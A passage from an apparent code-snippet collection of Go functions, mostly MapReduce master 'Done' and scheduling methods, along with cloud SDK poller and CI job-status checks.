here.\n\tm.mutex.Lock()\n\tdefer m.mutex.Unlock()\n\n\t// clear timeout task\n\tfor i, taskPatchTime := range m.todoMapTask {\n\t\tif taskPatchTime != 0 && taskPatchTime+10 < time.Now().Unix() {\n\t\t\tfmt.Printf(\"MapTask Timeout: TaskID:%d\\n\", i)\n\t\t\tm.todoMapTask[i] = 0\n\t\t}\n\t}\n\tfor i, taskPatchTime := range m.todoReduceTask {\n\t\tif taskPatchTime != 0 && taskPatchTime+10 < time.Now().Unix() {\n\t\t\tfmt.Printf(\"ReduceTask Timeout: TaskID:%d\\n\", i)\n\t\t\tm.todoReduceTask[i] = 0\n\t\t}\n\t}\n\n\tret = len(m.todoMapTask) == 0 && len(m.todoReduceTask) == 0\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\n\t// Your code here.\n\n\treturn m.end\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\t// show taskSummary\n\tlogger.Debug(fmt.Sprintf(\"TaskSummary:\\n%s\", m.printTaskSummary()))\n\n\t// Increment SinceLastHeartbeat field for each in-progress tasks\n\tm.increaseSinceLastHeartbeat()\n\n\t// Stop and reschedule task for task with SinceLastHeartbeat > 10\n\t// TODO: Implement fail recovery\n\tdeadTasks, ok := m.checkDeadWorker()\n\tif ok {\n\t\t// fail recovery\n\t\tfor _, dTaskInfo := range deadTasks {\n\t\t\tlogger.Debug(\"Fail recovery for deadWOrker() and deadTask() ...\")\n\t\t\tm.mu.Lock()\n\t\t\tm.aliveWorkerCount -= 1\n\t\t\tm.deadWorkerCount += 1\n\t\t\tm.mu.Unlock()\n\t\t\tm.resetTaskToIdle(dTaskInfo.TaskId)\n\t\t}\n\n\t}\n\n\t// Check if there is any undo task left\n\tif m.checkAllTaskFinished() {\n\t\tret = true\n\t}\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tret := false\n\t// Your code here.\n\tm.mutex.Lock()\n\tret = m.isFinished_\n\tm.mutex.Unlock()\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\tif m.reduceFinished == m.reduceTasks {\n\t\tret = true\n\t}\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tif m.State == Success {\n\t\treturn true\n\t}\n\n\t// Your code here.\n\tif m.State == Map {\n\t\treturn false\n\t}\n\tfor _, v := range m.ReduceTask {\n\t\tif v.Status != Finish {\n\t\t\treturn false\n\t\t}\n\t}\n\tm.State = Success\n\treturn true\n}", "func (m *Master) Done() bool {\n\n\t// Your code here.\n\treturn m.ReduceFinish\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\tm.Mutex.Lock()\n\tdefer m.Mutex.Unlock()\n\tif m.Phase == Reduce && len(m.Undone) == 0 && len(m.Doing) == 0 {\n\t\tret = true\n//\t\tlog.Printf(\"all tasks finished\")\n\t}\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\n\tif !m.isAllMapCompleted() {\n\t\tm.Mux.Lock()\n\t\tfor i := 0; i < m.M; i += 1 {\n\t\t\tif m.IsIdleMaps[i] == 1 {\n\t\t\t\tif time.Now().Unix() - m.MapTasksTime[i] > TIMEOUT {\n\t\t\t\t\tm.IsIdleMaps[i] = 0\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tm.Mux.Unlock()\n\t} else {\n\t\tm.Mux.Lock()\n\t\tfor i := 0; i < m.R; i += 1 {\n\t\t\tif m.IsIdleReduces[i] == 1 {\n\t\t\t\tif time.Now().Unix() - m.ReduceTasksTime[i] > TIMEOUT {\n\t\t\t\t\tm.IsIdleReduces[i] = 0\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tm.Mux.Unlock()\n\t}\n\n\tfor i := 0; i < m.R; i += 1 {\n\t\tif m.IsIdleReduces[i] != 2 {\n\t\t\treturn false\n\t\t}\n\t}\n\n\treturn true\n}", "func (m *Master) Done() bool {\n\t// ret := (JobDown == m.phase)\n\n\t// Your code here.\n\treturn JobDown == m.phase\n}", "func (m *Master) Done() bool {\n\n\t// Your code here.\n\tm.mutex.Lock()\n\tdefer m.mutex.Unlock()\n\treturn m.state == TearDown\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\tif len(m.completedTasks[0])==m.M && len(m.completedTasks[1])==m.R {\n\t\tret = true\n\t}\n\treturn ret\n}", "func (m *Master) Done() bool {\n\t// Your code here.\n\n\treturn m.done\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\tif m.remainReduceCount == 0 {\n\t\tret = true\n\t}\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tif m.done {\n\t\tfmt.Println(\"All task finished. Exiting...\")\n\t}\n\treturn m.done\n}", "func (m *Master) Done() bool {\n\t// Your code here.\n\tm.mu.Lock()\n\tdefer m.mu.Unlock()\n\n\treturn m.done\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\tif len(m.DoneReduceTask) == m.NReduce {\n\t\tret = true\n\t}\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tm.mu.Lock()\n\tdefer m.mu.Unlock()\n\tfor _, val := range m.RTasks {\n\t\tif val.status == IDLE || val.status == RUNNING {\n\t\t\treturn false\n\t\t}\n\t}\n\treturn true\n}", "func (m *Master) haveDone() bool {\n\tret := true\n\tt := time.Now().Unix()\n\tj := 0\n\tfor j < len(m.reduceTasks) {\n\t\tif m.reduceTasks[j].state == 1 {\n\t\t\tif t-m.reduceTasks[j].emittime >= TIMEOUT {\n\t\t\t\tm.reduceTasks[j].state = 0\n\t\t\t}\n\t\t}\n\t\tj++\n\t}\n\ti := 0\n\tfor _, reduceTask := range m.reduceTasks {\n\t\tif reduceTask.state == 0 {\n\t\t\tm.nextreducetask = i\n\t\t\tbreak\n\t\t}\n\t\ti++\n\t}\n\tfor _, reduceTask := range m.reduceTasks {\n\t\tif reduceTask.state != 2 {\n\t\t\tret = false\n\t\t\tbreak\n\t\t}\n\t}\n\tif ret {\n\t\tm.done = true\n\t}\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\n\tif (m.taskPhase == ExitPhase) {\n\t\tret = true\n\t}\n\t// Your code here.\n\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tm.lock.Lock()\n\tdefer m.lock.Unlock()\n\treturn m.mapDone && m.reduceDone\n}", "func (m *Master) Done() bool {\n\tm.RWMutexLock.Lock()\n\tdefer m.RWMutexLock.Unlock()\n\tret := m.reduceFinished\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tm.accessLock.Lock()\n\tdefer m.accessLock.Unlock()\n\tret := len(m.completedReduces) == m.nReduce\n\treturn ret\n}", "func (m *Master) mapfinished() bool {\n\tt := time.Now().Unix()\n\tret := true\n\tj := 0\n\tfor j < len(m.mapTasks) {\n\t\tif m.mapTasks[j].state == 1 {\n\t\t\tif t-m.mapTasks[j].emittime >= TIMEOUT {\n\t\t\t\tm.mapTasks[j].state = 0\n\t\t\t}\n\t\t}\n\t\tj++\n\t}\n\ti := 0\n\tfor i < len(m.mapTasks) {\n\t\tif m.mapTasks[i].state == 0 {\n\t\t\tm.nextmaptask = i\n\t\t\tbreak\n\t\t}\n\t\ti++\n\t}\n\tfor _, mapTask := range m.mapTasks {\n\t\tif mapTask.state != 2 {\n\t\t\tret = false\n\t\t\tbreak\n\t\t}\n\t}\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\tif m.M.ToDo <= 0 && m.R.ToDo <= 0 {\n\t\tret = true\n\t}\n\n\treturn ret\n}", "func (mr *MapReduce) RunMaster() []int {\n\tnumMapJobs := mr.nMap\n\tnumReduceJobs := mr.nReduce\n\tvar w sync.WaitGroup\n\n\tfor mapJob := 0; mapJob < numMapJobs; mapJob++ {\n\t\tavailableWorker := <-mr.registerChannel\n\t\tfmt.Println(\"USING WORKER\", availableWorker, \"for Map Job\")\n\t\tw.Add(1)\n\t\tgo func(worker string, i int) {\n\t\t\tdefer w.Done()\n\t\t\tvar reply DoJobReply\n\t\t\targs := &DoJobArgs{mr.file, Map, i, mr.nReduce}\n\t\t\tok := call(worker, \"Worker.DoJob\", args, &reply)\n\t\t\tif !ok {\n\t\t\t\tfmt.Println(\"Map Job\", i, \"has FAILED\")\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"Map Job\", i, \"is SUCCESS\")\n\t\t\t}\n\t\t\tmr.registerChannel <- worker\n\t\t}(availableWorker, mapJob)\n\t}\n\n\tw.Wait()\n\tfmt.Println(\"DONE WITH ALL MAP JOBS\")\n\n\tfor reduceJob := 0; reduceJob < numReduceJobs; reduceJob++ {\n\t\tavailableWorker := <-mr.registerChannel\n\t\tfmt.Println(\"USING WORKER\", availableWorker, \"for Reduce Job\")\n\t\tw.Add(1)\n\t\tgo func(worker string, i int) {\n\t\t\tdefer w.Done()\n\t\t\tvar reply DoJobReply\n\t\t\targs := &DoJobArgs{mr.file, Reduce, i, mr.nMap}\n\t\t\tok := call(worker, \"Worker.DoJob\", args, &reply)\n\t\t\tif !ok {\n\t\t\t\tfmt.Println(\"Reduce Job\", i, \"has FAILED\")\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"Reduce Job\", i, \"is SUCCESS\")\n\t\t\t}\n\t\t\tmr.registerChannel <- worker\n\t\t}(availableWorker, reduceJob)\n\t}\n\n\tw.Wait()\n\tfmt.Println(\"DONE WITH ALL REDUCE JOBS\")\n\n\treturn mr.KillWorkers()\n}", "func (op *RunJobOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (op *RunReportJobOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (mdb *memdbSlice) checkAllWorkersDone() bool {\n\n\t//if there are mutations in the cmdCh, workers are\n\t//not yet done\n\tif mdb.getCmdsCount() > 0 {\n\t\treturn false\n\t}\n\n\treturn true\n}", "func (p *SQLResourcesRetrieveContinuousBackupInformationPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *MongoDBResourcesRetrieveContinuousBackupInformationPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (op *UpdateJobOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (mr *MapReduce) RunMaster() *list.List {\n\t// Your code here\n\tsendList := list.New()\t\t// list of jobs that need to be dispatched\n\tjobList := list.New()\t\t// list of jobs that are waiting to finish\n\tdoneChan := make(chan string)\t// dispatcher thread signals on this channel when worker finishes job successfully\n\tfailChan := make(chan struct {jobNumber int; worker string})\t// dispatched thread signals here when worker fails to process request\n\t\n\t\n\t// Add all map jobs to lists\n\tfor i := 0; i < mr.nMap; i++ {\n\t\tsendList.PushBack(i)\n\t\tjobList.PushBack(i)\n\t}\n\t\n\t// Dispatch all map jobs and wait for them to finish\n\te := sendList.Front()\n\tfor jobList.Len() > 0 {\n\t\t// dispatch jobs if any are waiting\n\t\tif e != nil {\n\t\t\tif (mr.SendJob(mr.file, Map, e.Value.(int), mr.nReduce, doneChan, failChan) == true) {\n\t\t\t\tp := e\n\t\t\t\te = e.Next()\t\t// move to next job \n\t\t\t\tsendList.Remove(p)\t// and remove current job from list only if current job successfully sent\n\t\t\t}\n\t\t}\t\n\t\t\n\t\tselect {\n\t\tcase worker := <- mr.registerChannel:\t// process new worker registrations\n\t\t\tmr.Workers[worker] = &WorkerInfo{worker, -1, false, false}\n\t\t\tfmt.Printf(\"Registered worker %v\\n\", mr.Workers[worker])\n\t\t\t\n\t\tcase worker := <- doneChan:\t\t\t\t// take finished jobs off the jobList and mark the worker as free\n\t\t\tmr.Workers[worker].busy = false\n\t\t\tjobList.Remove(FindListElement(jobList, mr.Workers[worker].currentJobNumber))\n\t\t\tmr.Workers[worker].currentJobNumber = -1\n\t\t\t\n\t\tcase failure := <- failChan:\t\t\t// if any job fails, re-add the job to the sendList and mark the worker as failed \n\t\t\tsendList.PushBack(failure.jobNumber)\n\t\t\tmr.Workers[failure.worker].failed = true\n\t\t\t\n\t\t}\n\t\t\n\t}\n\t\n\tsendList.Init()\t// clear the lists\n\tjobList.Init()\n\t\n\t// Add all reduce jobs to the lists\n\tfor i := 0; i < mr.nReduce; i++ {\n\t\tsendList.PushBack(i)\n\t\tjobList.PushBack(i)\n\t}\n\t\n\t// Dispatch all reduce jobs and wait for them to finish\n\te = sendList.Front()\n\tfor jobList.Len() > 0 {\n\t\t// dispatch jobs if any are waiting\n\t\tif e != nil {\n\t\t\tif (mr.SendJob(mr.file, Reduce, e.Value.(int), mr.nMap, doneChan, failChan) == true) {\n\t\t\t\tp := e\n\t\t\t\te = e.Next()\t\t// move to next job \n\t\t\t\tsendList.Remove(p)\t// and remove current job from list only if current job successfully sent\n\t\t\t}\n\t\t}\t\n\t\t\n\t\tselect {\n\t\tcase worker := <- mr.registerChannel:\t// process new worker registrations\n\t\t\tmr.Workers[worker] = &WorkerInfo{worker, -1, false, false}\n\t\t\tfmt.Printf(\"Registered worker %v\\n\", mr.Workers[worker])\n\t\t\t\n\t\tcase worker := <- doneChan:\t\t\t\t// take finished jobs off the jobList and mark the worker as free\n\t\t\tmr.Workers[worker].busy = false\n\t\t\tjobList.Remove(FindListElement(jobList, mr.Workers[worker].currentJobNumber))\n\t\t\tmr.Workers[worker].currentJobNumber = -1\n\t\t\t\n\t\tcase failure := <- failChan:\t\t\t// if any job fails, re-add the job to the sendList and mark the worker as failed \n\t\t\tsendList.PushBack(failure.jobNumber)\n\t\t\tmr.Workers[failure.worker].failed = true\n\t\t}\n\t\t\n\t}\n\t\n\treturn mr.KillWorkers()\t\t// kill the workers and return\n}", "func (p *SQLResourcesClientRetrieveContinuousBackupInformationPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (c *Coordinator) Done() bool {\n\treturn c.MapAllDone && c.ReduceAllDone\n}", "func (m *Master) checkComplete(taskType string, taskNum int) {\n\n\ttime.Sleep(10 * time.Second)\n\tm.mu.Lock()\n\tif taskType == \"map\" {\n\t\tif m.mapState[taskNum].Value == \"in-progress\" {\n\t\t\tm.mapState[taskNum].Value = \"idle\"\n\t\t}\n\t} else {\n\t\tif m.reduceState[taskNum] == \"in-progress\" {\n\t\t\tm.reduceState[taskNum] = \"idle\"\n\t\t}\n\t}\n\tm.mu.Unlock()\n}", "func (p *MongoDBResourcesClientRetrieveContinuousBackupInformationPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func msmtFinished(currSrvBytes *uint) bool {\n\tif *currSrvBytes >= *msmtTotalBytes {\n\t\t// debug fmt.Println(\"\\nServer received everything from client: Msmt finished\")\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (fdb *fdbSlice) checkAllWorkersDone() bool {\n\n\t//if there are mutations in the cmdCh, workers are\n\t//not yet done\n\tif len(fdb.cmdCh) > 0 {\n\t\treturn false\n\t}\n\n\t//worker queue is empty, make sure both workers are done\n\t//processing the last mutation\n\tfor i := 0; i < NUM_WRITER_THREADS_PER_SLICE; i++ {\n\t\tfdb.workerDone[i] <- true\n\t\t<-fdb.workerDone[i]\n\t}\n\treturn true\n}", "func (g *Glob) Finished() bool {\n\treturn g.Empty()\n}", "func (s *commonFTSSimulator) Finished() bool {\n\treturn s.madeDocuments >= s.maxDocuments\n}", "func (op *UpdateReplicationOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (op *CreateJobOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (j *Job) done() { j.isDone <- true }", "func (p *ManagedClustersRunCommandPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *DeploymentsStartJFRPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (m *Master) Done() chan struct{} {\n\treturn m.done\n}", "func (op *StopReplicationOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (p *NotebookWorkspacesStartPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *DeploymentsRestartPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (op *DeleteJobOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (op *CreateReplicationOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (turingMachine *TuringMachine) HasFinished() bool {\n return turingMachine.hasFinished\n}", "func (c *Coordinator) Done() bool {\n\tc.mapLock.Lock()\n\tc.reduceLock.Lock()\n\tret := c.mapDoneTasks == len(c.mapTasks) &&\n\t\tc.reduceDoneTasks == len(c.reduceTasks)\n\tc.reduceLock.Unlock()\n\tc.mapLock.Unlock()\n\treturn ret\n}", "func (p *ManagedClustersStartPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (c *Coordinator) Done() bool {\n\tc.jobLock.Lock()\n\tdefer c.jobLock.Unlock()\n\n\treturn c.phase == CoordinatorPhaseDone\n}", "func (p *CassandraClustersUpdatePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func jobCompleted(job JobType) bool {\n\t// Call numerxData server to check the status of this job\n\t// return true if we get:\n\t// \t\t[“step”=”metaindexstatus”, “status”=”success”]\n\t//\tor [“step”=“eventindexstatus”, “status” = “success”]\n\t/*\n\t\t[\n\t\t\t{\"ID\":\"0.0.LqO~iOvJV3sdUOd8\",\"Step\":\"metaindexstatus\",\"Status\":\"success\",\"Timestamp\":1465589455508,\"Notes\":\"\"},\n\t\t\t{\"ID\":\"0.0.LqO~iOvJV3sdUOd8\",\"Step\":\"parsedmeta\",\"Status\":\"success\",\"Timestamp\":1465588843502,\"Notes\":\"\"},\n\t\t\t{\"ID\":\"0.0.LqO~iOvJV3sdUOd8\",\"Step\":\"rawmeta\",\"Status\":\"success\",\"Timestamp\":1465588543502,\"Notes\":\"\"}\n\t\t]\n\t*/\n\t// uri string, resource string, params map[string]string\n\tvar params map[string]string = make(map[string]string)\n\tparams[\"id\"] = job.JobId\n\trequest, err := fileUploadStatusRequest(baseUrl, \"/status\", params)\n\tif err != nil {\n\t\tlog.Println(err)\n\t\treturn false // let the caller func to handle retries\n\t}\n\n\tif verbose {\n\t\tlog.Println(\"RQ URL: \", request.URL)\n\t\tlog.Println(\"RQ Headers: \", request.Header)\n\t\tlog.Println(\"RQ Body: \", request)\n\t}\n\n\tclient := &http.Client{}\n\tresp, err := client.Do(request)\n\tif err != nil {\n\t\tlog.Println(err)\n\t\treturn false // let the caller func to handle retries\n\t} else {\n\t\t/* JSON\n\t\t[\n\t\t\t{\"ID\":\"0.0.LqO~iOvJV3sdUOd8\",\"Step\":\"metaindexstatus\",\"Status\":\"success\",\"Timestamp\":1465589455508,\"Notes\":\"\"},\n\t\t\t{\"ID\":\"0.0.LqO~iOvJV3sdUOd8\",\"Step\":\"parsedmeta\",\"Status\":\"success\",\"Timestamp\":1465588843502,\"Notes\":\"\"},\n\t\t\t{\"ID\":\"0.0.LqO~iOvJV3sdUOd8\",\"Step\":\"rawmeta\",\"Status\":\"success\",\"Timestamp\":1465588543502,\"Notes\":\"\"}\n\t\t]\n\t\t*/\n\t\tdefer resp.Body.Close()\n\n\t\tvar bodyContent []byte\n\t\tif verbose {\n\t\t\tlog.Println(\"Status RS Status: \", resp.StatusCode)\n\t\t\tlog.Println(\"Status RS Headers: \", resp.Header)\n\t\t}\n\n\t\tbodyContent, err := ioutil.ReadAll(resp.Body)\n\n\t\tif verbose {\n\t\t\tlog.Println(\"Status RS Content: error? :\", err)\n\t\t\tlog.Println(\"Status RS Content: body: bytes: \", bodyContent)\n\t\t\tlog.Println(\"Status RS Content: body: string: \", string(bodyContent))\n\t\t}\n\t\tif resp.StatusCode == 200 {\n\t\t\t// Check the step's status\n\t\t\tstatus, err := getStatusResponse(bodyContent)\n\t\t\tif err != nil {\n\t\t\t\tlog.Printf(\"Error %v while checking status for %v, file: %v \\n\", err, job.JobId, job.Filename)\n\t\t\t\treturn false // let the caller func to handle retries\n\t\t\t} else {\n\t\t\t\tswitch requestType {\n\t\t\t\tcase RQ_Viewership:\n\t\t\t\t\tfor _, entry := range status {\n\t\t\t\t\t\tswitch entry.Step {\n\t\t\t\t\t\tcase string(IndexEventData): // \"eventindexstatus\":\n\t\t\t\t\t\t\tswitch entry.Status {\n\t\t\t\t\t\t\tcase string(Success): // \"success\":\n\t\t\t\t\t\t\t\tif verbose {\n\t\t\t\t\t\t\t\t\tlog.Printf(\"Complete for: %s, file: %s\\n\", job.JobId, job.Filename)\n\t\t\t\t\t\t\t\t\tlog.Println(\"Current state: \", status)\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\treturn true\n\t\t\t\t\t\t\tcase string(Failure): // \"failure\":\n\t\t\t\t\t\t\t\tfailedJobsChan <- job\n\t\t\t\t\t\t\t\treturn true\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\tcase string(ParsedEventData), string(RawEventData):\n\t\t\t\t\t\t\tif entry.Status == string(Failure) {\n\t\t\t\t\t\t\t\tfailedJobsChan <- job\n\t\t\t\t\t\t\t\treturn true\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tif verbose {\n\t\t\t\t\t\tlog.Printf(\"Not yet: %s, file: %s\\n\", job.JobId, job.Filename)\n\t\t\t\t\t\tlog.Println(\"Current state: \", status)\n\t\t\t\t\t}\n\n\t\t\t\t//\t(actually the new struct with file-name, id, and retry-number)\n\t\t\t\tcase RQ_MetaBilling, RQ_MetaProgram, RQ_MetaChanMap, RQ_MetaEventMap:\n\t\t\t\t\tfor _, entry := range status {\n\t\t\t\t\t\tswitch entry.Step {\n\t\t\t\t\t\tcase string(IndexMetaData): // \"metaindexstatus\":\n\t\t\t\t\t\t\tswitch entry.Status {\n\t\t\t\t\t\t\tcase string(Success): // \"success\":\n\t\t\t\t\t\t\t\tif verbose {\n\t\t\t\t\t\t\t\t\tlog.Printf(\"Complete for: %s, file: %s\\n\", job.JobId, job.Filename)\n\t\t\t\t\t\t\t\t\tlog.Println(\"Current state: \", status)\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\treturn true\n\t\t\t\t\t\t\tcase string(Failure): // \"failure\":\n\t\t\t\t\t\t\t\tfailedJobsChan <- job\n\t\t\t\t\t\t\t\treturn true\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\tcase string(ParsedMetaData), string(RawMetaData):\n\t\t\t\t\t\t\tif entry.Status == string(Failure) {\n\t\t\t\t\t\t\t\tfailedJobsChan <- job\n\t\t\t\t\t\t\t\treturn true\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tif verbose {\n\t\t\t\t\t\tlog.Printf(\"Not yet: %s, file: %s\\n\", job.JobId, job.Filename)\n\t\t\t\t\t\tlog.Println(\"Current state: \", status)\n\t\t\t\t\t}\n\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\tlog.Println(\"Error Status %v while checking status for %v, file: %s \\n\", err, job.JobId, job.Filename)\n\t\t\tfailedJobsChan <- job\n\t\t\tif verbose {\n\t\t\t\tlog.Println(\"Error Status %v while checking status for %v, file: %s \\n\", err, job.JobId, job.Filename)\n\t\t\t}\n\t\t\treturn true\n\t\t}\n\t}\n\n\treturn false\n}", "func (p *NotebookWorkspacesClientStartPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *CassandraDataCentersUpdatePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (m *Master) finishTask(args *Args) {\n\tm.mu.Lock()\n\tdefer m.mu.Unlock()\n\tif m.status == MapStage {\n\t\tdelete(m.mapInProgress, args.TaskId)\n\t\tm.mapFinished++\n\t\tif m.mapFinished == len(m.mapTasks) {\n\t\t\tm.status = ReduceStage\n\t\t}\n\t\tfmt.Println(\"finished 1 map task\")\n\t} else if m.status == ReduceStage {\n\t\tdelete(m.reduceInProgress, args.TaskId)\n\t\tm.reduceFinished++\n\t\tif m.reduceFinished == m.reduceTasks {\n\t\t\tm.status = FinishedStage\n\t\t}\n\t\tm.deleteIntermediates(args.TaskId)\n\t\tfmt.Println(\"finished 1 reduce task\")\n\t}\n}", "func checkForJobSuccess(org, repo string, targetBuildNum int, client *circleci.Client) (err error) {\n\tcheckAttempts := 0\n\tcheckLimit := 60\n\tcheckInterval := 5 * time.Second\n\tlogger.Infof(\"Polling CircleCI for status of build: %d\", targetBuildNum)\n\tfor {\n\t\tvar build *circleci.Build\n\t\tif build, err = client.GetBuild(org, repo, targetBuildNum); err != nil {\n\t\t\treturn\n\t\t}\n\t\tif build.Status == \"success\" {\n\t\t\tlogger.Infof(\"Detected success of CircleCI build: %d\", targetBuildNum)\n\t\t\tbreak\n\t\t} else if build.Status == \"failed\" {\n\t\t\treturn fmt.Errorf(\"CircleCI job: %d has failed\", targetBuildNum)\n\t\t}\n\t\tcheckAttempts++\n\t\tif checkAttempts == checkLimit {\n\t\t\treturn fmt.Errorf(\"Unable to verify CircleCI job was a success: https://circleci.com/gh/%s/%s/%d\",\n\t\t\t\torg, repo, targetBuildNum)\n\t\t}\n\t\ttime.Sleep(checkInterval)\n\t}\n\treturn\n}", "func Check(conf *config.Config, queue *Queue, running *Running, manager manager.Driver) error {\n\tlog.Println(\"Checking for a job to run\")\n\tlog.Println(\"Queue: \", *queue)\n\trunning.Watch(&manager)\n\tnext := queue.Pop(running, conf.Server.MaxBuilds)\n\tif next != nil {\n\t\tlog.Println(\"About to build: \", next.Project, next.Branch)\n\t\tfor i := range conf.Projects {\n\t\t\tif next.Project == conf.Projects[i].Name {\n\t\t\t\tshouldDeploy := false\n\t\t\t\tlog.Println(\"Found a job to run\")\n\t\t\t\tfor j := range conf.Projects[i].DeployBranches {\n\t\t\t\t\tif next.Branch == conf.Projects[i].DeployBranches[j] {\n\t\t\t\t\t\tlog.Println(\"Will Deploy\")\n\t\t\t\t\t\tshouldDeploy = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tconfPath := conf.Projects[i].MaestroConfPath\n\t\t\t\tlog.Println(\"Running build\")\n\t\t\t\trunErr := manager.Run(\n\t\t\t\t\tfmt.Sprintf(\"%s-%s-%s\", next.Project, next.Branch, next.CurrCommit),\n\t\t\t\t\tconfDir(confPath),\n\t\t\t\t\tconfDir(confPath),\n\t\t\t\t\t[]string{\n\t\t\t\t\t\t\"maestro\",\n\t\t\t\t\t\tfmt.Sprintf(\"--branch=%s\", next.Branch),\n\t\t\t\t\t\tfmt.Sprintf(\"--deploy=%v\", shouldDeploy),\n\t\t\t\t\t\tfmt.Sprintf(\"--prev-commit=%s\", next.PrevCommit),\n\t\t\t\t\t\tfmt.Sprintf(\"--curr-commit=%s\", next.CurrCommit),\n\t\t\t\t\t\tfmt.Sprintf(\"--config=%s\", confPath),\n\t\t\t\t\t\tfmt.Sprintf(\"--clone-path=%s\", conf.Server.WorkspaceDir),\n\t\t\t\t\t},\n\t\t\t\t)\n\t\t\t\treturn runErr\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func (p *CustomDomainsUpdatePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (Mr *Master) ReceiveFinish(filenames []string) {\n\tlog.Println(\"outside of lock\")\n\tMr.Timer.Lock()\n\tlog.Println(\"in lock\")\n\tfor _, filename := range filenames {\n\t\tMr.FileCondition[filename] = 2\n\t}\n\tMr.Timer.Unlock()\n}", "func (c *Coordinator) Done() bool {\n\treturn c.isDone.Load().(bool)\n}", "func (mr *Master) schedule(phase jobPhase) {\n\tvar ntasks int\n\tvar nios int // number of inputs (for reduce) or outputs (for map)\n\tswitch phase {\n\tcase mapPhase:\n\t\tntasks = len(mr.files)\n\t\tnios = mr.nReduce\n\tcase reducePhase:\n\t\tntasks = mr.nReduce\n\t\tnios = len(mr.files)\n\t}\n\n\tfmt.Printf(\"Schedule: %v %v tasks (%d I/Os)\\n\", ntasks, phase, nios)\n\n\t// them have been completed successfully should the function return.\n\t// Remember that workers may fail, and that any given worker may finish\n\t// multiple tasks.\t// All ntasks tasks have to be scheduled on workers, and only once all of\n\n\t//\n\t// TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO\n\t// mycode\n\tvar wg sync.WaitGroup\n\twg.Add(ntasks)\n\ti := int32(-1)\n\n\tif phase == mapPhase {\n\t\tfor {\n\t\t\tvar worker string\n\t\t\tworker = <-mr.registerChannel\n\t\t\tif worker == \"done\" {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tgo func() {\n\t\t\t\tfor {\n\t\t\t\t\tt := atomic.AddInt32(&i, 1)\n\t\t\t\t\tfmt.Printf(\"map worker = %s, t = %d\\n\", worker, t)\n\t\t\t\t\tif t > int32(ntasks) {\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t\tif t == int32(ntasks) {\n\t\t\t\t\t\tmr.registerChannel <- \"done\"\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t\tfile := mr.files[t]\n\t\t\t\t\targs := DoTaskArgs{\"test\", file, phase, int(t), nios}\n\t\t\t\t\t//rpc worker possible have error\n\t\t\t\t\tif !call(worker, \"Worker.DoTask\", args, new(struct{})) {\n\t\t\t\t\t\tfmt.Printf(\"mapworkfailed %s\\n\", worker)\n\t\t\t\t\t\tt = atomic.AddInt32(&i, -1)\n\t\t\t\t\t\t//recall after one seconds\n\t\t\t\t\t\tbreak\n\t\t\t\t\t} else {\n\t\t\t\t\t\tfmt.Printf(\"success t = %d\\n\", t)\n\t\t\t\t\t\twg.Done()\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}()\n\t\t}\n\t\twg.Wait()\n\t}\n\n\tif phase == reducePhase {\n\t\tfmt.Printf(\"workers num=%d\\n\", len(mr.workers))\n\t\tfmt.Println(\"reduce begin\")\n\t\t//new worker\n\t\tgo func() {\n\t\t\tfor {\n\t\t\t\tworker := 